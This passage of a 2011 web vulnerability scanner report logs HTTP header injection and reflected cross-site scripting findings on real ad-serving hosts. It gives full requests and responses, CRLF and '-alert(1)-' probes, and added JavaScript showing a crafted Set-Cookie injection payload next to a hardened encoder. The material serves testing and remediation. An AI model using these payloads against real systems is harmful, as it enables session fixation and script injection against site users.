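    const i = line.indexOf(':');
    return i === -1
      ? ['<no-name>', line]
      : [line.slice(0, i).trim(), line.slice(i + 1).trim()];
  });
}

function headerValue(headers, name) {
  const hit = headers.find(([n]) => n.toLowerCase() === name.toLowerCase());
  return hit ? hit[1] : undefined;
}

const REPORT_PAYLOAD = '857aa%0d%0a08a4076f552';   // the scanner's probe from issue 2.1
// Constructed: same CRLF, but the injected line is a full Set-Cookie header and
// a second CRLF parks the remainder of the path in a throwaway header.
const COOKIE_PAYLOAD = 'ad%0d%0aSet-Cookie:%20sid=attacker;%20path=/%0d%0aX-Ignored:%20';
```

With REPORT_PAYLOAD the parsed headers contain a Location of http://static.2mdn.net/857aa followed by a nameless line starting with 08a4076f552/, which is the split the report shows. With COOKIE_PAYLOAD the parser returns a Set-Cookie header of sid=attacker; path=/ that the client will honour. buildRedirectSafe throws on both payloads and passes a plain segment through unchanged.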


2.1. http://ad.doubleclick.net/ad/x1.aud/capitalone/exclusion [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /ad/x1.aud/capitalone/exclusion

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 857aa%0d%0a08a4076f552 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /857aa%0d%0a08a4076f552/x1.aud/capitalone/exclusion;sz=1x1;ord=1234567? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.capitalone.com/directbanking/online-checking-accounts/interest-online-checking-account/?linkid=WWW_Z_Z_Z__C2_01_T_SP1ca646%252522%25253E%25253Ca%25253E91c2cd96a28
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/857aa
08a4076f552
/x1.aud/capitalone/exclusion;sz=1x1;ord=1234567:
Date: Fri, 22 Jul 2011 20:31:34 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.2. http://ad.doubleclick.net/adj/N5762.interclick.com/B5644777.4 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5762.interclick.com/B5644777.4

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 52bf7%0d%0ab0653725eae was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /52bf7%0d%0ab0653725eae/N5762.interclick.com/B5644777.4;sz=728x90;pc=;click=http://a1.interclick.com/icaid/180684/tid/3beaebd4-bdf2-41be-a78d-f9e43cf0a056/click.ic?;ord=634468586978366444? HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lifescript.com/adcontrol.htm?adj/lfs2.lifescript/conditions;path=health/conditions/add/how_to_quiet_the_symptoms_of_adult_adhd;contentid=7f47b713;abr=!webtvs;tax=adhd_adult;tax=adhd;tax=adult_adhd;camp=adhd;camp=adhd_adult;pos=2;tile=6;sz=728x90;ord=101352252258050
Cookie: id=2230b5db2501004b||t=1311254584|et=730|cs=002213fd48635305ba9b0e4419

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/52bf7
b0653725eae
/N5762.interclick.com/B5644777.4;sz=728x90;pc=;click=http: //a1.interclick.com/icaid/180684/tid/3beaebd4-bdf2-41be-a78d-f9e43cf0a056/click.ic
Date: Thu, 21 Jul 2011 19:32:11 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.3. http://ad.doubleclick.net/adj/scmag.hmktus/sc [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/scmag.hmktus/sc

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 8bcac%0d%0aa53c51e38c5 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /8bcac%0d%0aa53c51e38c5/scmag.hmktus/sc;log=0;sid=0;cc=us;pos=1501;tile=1;dcopt=ist;sz=640x480;ord=907953021859604900? HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.scmagazineus.com/
Cookie: id=2230b5db2501004b||t=1311254584|et=730|cs=002213fd48635305ba9b0e4419

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/8bcac
a53c51e38c5
/scmag.hmktus/sc;log=0;sid=0;cc=us;pos=1501;tile=1;dcopt=ist;sz=640x480;ord=907953021859604900:
Date: Fri, 22 Jul 2011 20:15:54 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.4. http://ad.doubleclick.net/getcamphist [src parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /getcamphist

Issue detail

The value of the src request parameter is copied into the Location response header. The payload b4827%0d%0a1a9ebdf4b81 was submitted in the src parameter. This caused a response containing an injected HTTP header.

Request

GET /getcamphist;src=1513429;host=metrics.apple.com%2Fb%2Fss%2Fappleglobal%2Capplehome%2F1%2FH.22.1%2Fs45228154349606%3FAQB%3D1%26vvpr%3Dtrue%26%26ndh%3D1%26t%3D21%252F6%252F2011%252015%253A25%253A9%25204%2520300%26pageName%3Dapple%2520-%2520index%252Ftab%2520%28us%29%26g%3Dhttp%253A%252F%252Fwww.apple.com%252F%26cc%3DUSD%26vvp%3DDFA%25231513429%253Av46%253D%255B%255B%2522DFA-%2522%252Blis%252B%2522-%2522%252Blip%252B%2522-%2522%252Blastimp%252B%2522-%2522%252Blastimptime%252B%2522-%2522%252Blcs%252B%2522-%2522%252Blcp%252B%2522-%2522%252Blastclk%252B%2522-%2522%252Blastclktime%255D%255D%26ch%3Dwww.us.homepage%26c4%3DD%253Dg%26c5%3Dwin32%26c6%3DD%253D%2522%253A%2520%2522%252BpageName%26c9%3Dwindows%26c15%3Dno%2520zip%26c18%3Dno%2520quicktime%26c19%3Dflash%252010%26c20%3Dnon-store%2520kiosk%26c25%3Dother%2520nav%2520or%2520none%26c44%3Dappleglobal%252Capplehome%26c48%3D1%26c49%3DD%253Ds_vi%26c50%3Dhomepage%253D1%26s%3D1920x1200%26c%3D32%26j%3D1.6%26v%3DY%26k%3DY%26bw%3D1065%26bh%3D723%26p%3DShockwave%2520Flash%253BJava%2520Deployment%2520Toolkit%25206.0.260.3%253BJava%28TM%29%2520Platform%2520SE%25206%2520U26%253BChrome%2520PDF%2520Viewer%253BWPI%2520Detector%25201.3%253BDefault%2520Plug-in%253B%26AQE%3D1b4827%0d%0a1a9ebdf4b81&A2S=1;ord=1742714097 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.apple.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://metrics.apple.com/b/ss/appleglobal,applehome/1/H.22.1/s45228154349606?AQB=1&vvpr=true&&ndh=1&t=21%2F6%2F2011%2015%3A25%3A9%204%20300&pageName=apple%20-%20index%2Ftab%20(us)&g=http%3A%2F%2Fwww.apple.com%2F&cc=USD&vvp=DFA%231513429%3Av46%3D%5B%5B%22DFA-%22%2Blis%2B%22-%22%2Blip%2B%22-%22%2Blastimp%2B%22-%22%2Blastimptime%2B%22-%22%2Blcs%2B%22-%22%2Blcp%2B%22-%22%2Blastclk%2B%22-%22%2Blastclktime%5D%5D&ch=www.us.homepage&c4=D%3Dg&c5=win32&c6=D%3D%22%3A%20%22%2BpageName&c9=windows&c15=no%20zip&c18=no%20quicktime&c19=flash%2010&c20=non-store%20kiosk&c25=other%20nav%20or%20none&c44=appleglobal%2Capplehome&c48=1&c49=D%3Ds_vi&c50=homepage%3D1&s=1920x1200&c=32&j=1.6&v=Y&k=Y&bw=1065&bh=723&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava(TM)%20Platform%20SE%206%20U26%3BChrome%20PDF%20Viewer%3BWPI%20Detector%201.3%3BDefault%20Plug-in%3B&AQE=1b4827
1a9ebdf4b81
&A2S=1/respcamphist;src=1513429;ec=nh;rch=2;lastimp=0;lastimptime=0;lis=0;lip=0;lic=0;lir=0;lirv=0;likv=0;lipn=;lastclk=0;lastclktime=0;lcs=0;lcp=0;lcc=0;lcr=0;lcrv=0;lckv=0;lcpn=;ord=1311279927:
Date: Thu, 21 Jul 2011 20:25:27 GMT
Server: GFE/2.0
Content-Type: text/html


3. Cross-site scripting (reflected)
There are 134 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences: strict validation of the input when it arrives, and encoding of the data at every point where it is copied into a response, using the encoding that matches the context it lands in (HTML body, HTML attribute, JavaScript string, URL). In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


3.1. http://a.collective-media.net/adj/cm.yearbook/ford_ron_071911 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.yearbook/ford_ron_071911

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 73883'-alert(1)-'aea0893a815 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/cm.yearbook73883'-alert(1)-'aea0893a815/ford_ron_071911;sz=300x250;ord=1520731557? HTTP/1.1
Host: a.collective-media.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://games.myyearbook.com/
Cookie: cli=11fda490648f83c

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 459
Date: Thu, 21 Jul 2011 18:00:44 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Sat, 20-Aug-2011 18:00:44 GMT

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/cm.yearbook73883'-alert(1)-'aea0893a815/ford_ron_071911;sz=300x250;net=cm;ord=1520731557;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...
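
The response above, and the context-specific encoding the remediation background calls for, as an added example that is not the ad server's code. buildTagUnsafe reproduces the observed document.write line in shortened form (the original is cut at ...[SNIP]..., so the closing of the script tag is assumed); buildTagSafe applies URL encoding for the attribute/URL context and then escaping for the JavaScript string context; runTag is a stand-in for the browser that records what alert and document.write receive. PAYLOAD_3_1 is the probe from issue 3.1; the other payload and all function names are this example's own.

```javascript
// Added example: '-alert(1)-' inside a single-quoted JS string, and its fix.

// Vulnerable pattern as observed: the raw path segment is spliced into a
// single-quoted string literal, so a ' in it closes the literal and the rest
// of the value is parsed as code.
function buildTagUnsafe(segment) {
  return "document.write('<scr'+'ipt language=\"javascript\" src=\"http://a.collective-media.net/cmadj/" +
    segment + "/ford_ron_071911;sz=300x250;net=cm;ord=1520731557?\"></scr'+'ipt>');";
}

// Escape for a JavaScript string literal: everything outside a small
// allow-list becomes \xHH or \uHHHH, so quotes, backslashes, angle brackets
// and line terminators can neither end the literal nor the <script> block.
function jsStringEscape(s) {
  let out = '';
  for (const ch of s.split('')) {            // UTF-16 code units, so \u always fits
    if (/[A-Za-z0-9._-]/.test(ch)) { out += ch; continue; }
    const code = ch.charCodeAt(0);
    out += code < 0x100
      ? '\\x' + code.toString(16).padStart(2, '0')
      : '\\u' + code.toString(16).padStart(4, '0');
  }
  return out;
}

// Hardened form. The value ends up in a URL inside an HTML attribute that is
// itself inside a JS string, so encode outer-first: percent-encode for the
// URL/attribute, then JS-escape. The browser undoes the JS escapes first and
// only then parses the HTML that document.write emits.
function buildTagSafe(segment) {
  const encoded = jsStringEscape(encodeURIComponent(segment));
  return "document.write('<scr'+'ipt language=\"javascript\" src=\"http://a.collective-media.net/cmadj/" +
    encoded + "/ford_ron_071911;sz=300x250;net=cm;ord=1520731557?\"></scr'+'ipt>');";
}

// Minimal browser stand-in: executes the generated script with a fake
// document and alert and returns what each received.
function runTag(code) {
  const alerts = [];
  const written = [];
  new Function('document', 'alert', code)(
    { write: s => written.push(String(s)) },
    x => { alerts.push(x); },
  );
  return { alerts, written };
}

const PAYLOAD_3_1 = "cm.yearbook73883'-alert(1)-'aea0893a815";  // issue 3.1, REST URL parameter 2
const PAYLOAD_HTML = 'x"><script>alert(2)</script>';             // constructed: attribute break-out
```

With the unsafe builder, PAYLOAD_3_1 yields 'A'-alert(1)-'B', which calls alert before document.write runs; with the safe builder the same value is written out verbatim inside the URL and nothing executes. PAYLOAD_HTML shows why the URL encoding layer is needed as well: JS escaping alone would decode back to a raw " and > in the written HTML.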

3.2. http://a.collective-media.net/adj/cm.yearbook/ford_ron_071911 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.yearbook/ford_ron_071911

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4bcfc'-alert(1)-'53d92bb185c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/cm.yearbook/ford_ron_0719114bcfc'-alert(1)-'53d92bb185c;sz=300x250;ord=1520731557? HTTP/1.1
Host: a.collective-media.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://games.myyearbook.com/
Cookie: cli=11fda490648f83c

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 459
Date: Thu, 21 Jul 2011 18:00:44 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Sat, 20-Aug-2011 18:00:44 GMT

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/cm.yearbook/ford_ron_0719114bcfc'-alert(1)-'53d92bb185c;sz=300x250;net=cm;ord=1520731557;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

3.3. http://a.collective-media.net/adj/cm.yearbook/ford_ron_071911 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.yearbook/ford_ron_071911

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2919b'-alert(1)-'05bcbf3a0e5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/cm.yearbook/ford_ron_071911;sz=300x250;ord=1520731557?&2919b'-alert(1)-'05bcbf3a0e5=1 HTTP/1.1
Host: a.collective-media.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://games.myyearbook.com/
Cookie: cli=11fda490648f83c

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 463
Date: Thu, 21 Jul 2011 18:00:44 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Sat, 20-Aug-2011 18:00:44 GMT

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/cm.yearbook/ford_ron_071911;sz=300x250;net=cm;ord=1520731557?&2919b'-alert(1)-'05bcbf3a0e5=1;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

3.4. http://a.collective-media.net/adj/cm.yearbook/ford_ron_071911 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.yearbook/ford_ron_071911

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d5f83'-alert(1)-'2441cffc4b5 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/cm.yearbook/ford_ron_071911;sz=300x250;ord=1520731557?d5f83'-alert(1)-'2441cffc4b5 HTTP/1.1
Host: a.collective-media.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://games.myyearbook.com/
Cookie: cli=11fda490648f83c

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 460
Date: Thu, 21 Jul 2011 18:00:44 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Sat, 20-Aug-2011 18:00:44 GMT

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/cm.yearbook/ford_ron_071911;sz=300x250;net=cm;ord=1520731557?d5f83'-alert(1)-'2441cffc4b5;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

3.5. http://a.collective-media.net/adj/idgt.curse/idgtcoad [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/idgt.curse/idgtcoad

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ee038'-alert(1)-'ff9be4c80be was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/idgt.curseee038'-alert(1)-'ff9be4c80be/idgtcoad;sec=video;sec=coad;tile=2;sz=300x250;ord=9047505581424790? HTTP/1.1
Host: a.collective-media.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://wow.curse.com/downloads/wow-addons/details/rawr-official.aspx
Cookie: cli=11fda490648f83c; JY57=3kllfTqBzxxTNc9vAlundMYc3uaxeM3o8ANWZfHmJX3kmfPanrzCyLw; dc=dc; nadp=1; exdp=1; vadp=1; ibvr=1; targ=1; brlg=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 485
Date: Sat, 23 Jul 2011 04:48:40 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Mon, 22-Aug-2011 04:48:40 GMT

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/idgt.curseee038'-alert(1)-'ff9be4c80be/idgtcoad;sec=video;sec=coad;tile=2;sz=300x250;net=idgt;ord=9047505581424790;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

3.6. http://a.collective-media.net/adj/idgt.curse/idgtcoad [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/idgt.curse/idgtcoad

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7d26e'-alert(1)-'fa2fdef4e1e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/idgt.curse/idgtcoad7d26e'-alert(1)-'fa2fdef4e1e;sec=video;sec=coad;tile=2;sz=300x250;ord=9047505581424790? HTTP/1.1
Host: a.collective-media.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://wow.curse.com/downloads/wow-addons/details/rawr-official.aspx
Cookie: cli=11fda490648f83c; JY57=3kllfTqBzxxTNc9vAlundMYc3uaxeM3o8ANWZfHmJX3kmfPanrzCyLw; dc=dc; nadp=1; exdp=1; vadp=1; ibvr=1; targ=1; brlg=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 485
Date: Sat, 23 Jul 2011 04:48:40 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Mon, 22-Aug-2011 04:48:40 GMT

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/idgt.curse/idgtcoad7d26e'-alert(1)-'fa2fdef4e1e;sec=video;sec=coad;tile=2;sz=300x250;net=idgt;ord=9047505581424790;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

3.7. http://a.collective-media.net/adj/idgt.curse/idgtcoad [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/idgt.curse/idgtcoad

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8b429'-alert(1)-'c56bbbc539a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/idgt.curse/idgtcoad;sec=video;sec=coad;tile=2;sz=300x250;ord=9047505581424790?&8b429'-alert(1)-'c56bbbc539a=1 HTTP/1.1
Host: a.collective-media.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://wow.curse.com/downloads/wow-addons/details/rawr-official.aspx
Cookie: cli=11fda490648f83c; JY57=3kllfTqBzxxTNc9vAlundMYc3uaxeM3o8ANWZfHmJX3kmfPanrzCyLw; dc=dc; nadp=1; exdp=1; vadp=1; ibvr=1; targ=1; brlg=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 489
Date: Sat, 23 Jul 2011 04:48:40 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Mon, 22-Aug-2011 04:48:40 GMT

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
